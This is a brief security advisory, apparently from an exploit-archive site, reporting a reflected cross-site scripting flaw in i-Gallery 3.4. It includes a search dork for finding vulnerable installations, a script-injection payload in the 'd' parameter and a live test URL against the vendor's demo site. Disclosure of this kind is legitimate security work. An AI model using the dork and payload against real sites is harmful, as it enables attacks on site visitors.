i-Gallery 3.4 Cross Site Scripting

2011.09.22
Credit: kurd-team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

=========================================================== i-Gallery 3.4 asp Cross-site scripting Vulnerability ----------------------------------------------------------- foun by :kurd-team group : kurdish hackers team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- script : i-Gallery 3.4 site :http://www.b-cp.com/igallery34/ download : http://www.b-cp.com/igallery/download-count.asp ----------------------------------------------------------- dork : Powered By: i-Gallery 3.4 Exploit: -------- Exmple: ------- igallery.asp?d="><script>alert('kurd-team')</script> live teast : http://www.b-cp.com/igallery34/igallery.asp?d="><script>alert('kurd-team')</script> ----------------------------------------------------------- Zryan_kurd ,root-SyS , all Member cold hackers team(cmg-team.com) , all kurdish hackers ----------------------------------------------------------- ==================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top